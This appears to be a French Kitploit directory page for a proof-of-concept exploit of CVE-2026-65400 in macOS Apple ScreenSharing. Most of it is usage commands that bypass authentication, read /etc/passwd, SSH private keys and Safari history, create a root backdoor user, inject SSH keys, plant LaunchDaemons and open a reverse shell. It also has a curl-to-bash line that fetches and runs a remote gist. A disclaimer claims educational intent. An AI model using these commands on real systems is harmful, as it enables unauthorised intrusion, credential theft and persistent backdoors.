Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/horkimhab/cve-2026-65400
Escalade de PrivilègesMécanismes de PersistanceExploitationPost-ExploitationAuthentificationApprentissage et ÉducationOutil d'Accès à Distance
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

Exploit de preuve de concept pour CVE-2026-65400 permettant la lecture/écriture authentifiée de fichiers, des shells inversés et la persistance sur macOS via Apple ScreenSharing.

Voir le dépôt
319il y a 22 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2026-65400

Faire un don

Soutenez la maintenance de ce projet via PayPal ou en scannant le code QR ci-dessous.

paypal

QR code for donation

⚡ Utilisation simple

Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que :

  • Machines virtuelles locales
  • Conteneurs Docker
  • Configurations de laboratoire isolées
  • Environnements de tests d'intrusion autorisés

Exemple de configuration :

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Exemple d'utilisation :

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

Remarque :

  • si vous clonez depuis un autre projet, vous devez exécuter curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y pour nettoyer le répertoire .git imbriqué
  • ex. : cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédits ou références

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 Dépôt de recherche en cybersécurité

Un dépôt pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.


⚠️ Avertissement de sécurité et légal

Objectif

Ce dépôt est destiné uniquement à la recherche en sécurité, à des fins éducatives et autorisées.

Il est conçu pour aider les utilisateurs à en apprendre davantage sur :

  • Les vulnérabilités de sécurité
  • Les concepts de bac à sable (sandbox) et d'isolation
  • Les pratiques de codage sécurisé et de défense

Utilisation autorisée uniquement

Utilisez ce dépôt uniquement dans des environnements pour lesquels vous avez l'autorisation, tels que :

  • Laboratoires personnels ou machines virtuelles
  • Environnements Docker ou isolés
  • Tests d'intrusion autorisés
  • Formation en cybersécurité ou recherche académique

Toute utilisation non autorisée ou illégale est strictement interdite.


Aucune responsabilité

L'auteur et les contributeurs ne sont pas responsables des dommages, utilisations abusives, problèmes juridiques ou pertes causés par ce projet.

En utilisant ce dépôt, vous acceptez que :

  • Vous êtes responsable de vos propres actions
  • Vous l'utiliserez de manière légale et éthique
  • Le projet est fourni sans garantie

Utilisation éthique

Ce projet est destiné à :

  • La recherche en sécurité défensive
  • L'éducation à la cybersécurité
  • La sensibilisation aux vulnérabilités
  • La recherche sur les systèmes et logiciels sécurisés

Veuillez suivre les pratiques de divulgation responsable et vous conformer à toutes les lois applicables.


Contact

Pour une divulgation responsable ou une collaboration, contactez le mainteneur du dépôt via GitHub.


Projet connexe

Explorez la Collection de PoC CVE pour des ressources supplémentaires de preuves de concept CVE destinées à la recherche et à l'éducation en sécurité autorisées.

Télécharger l’outil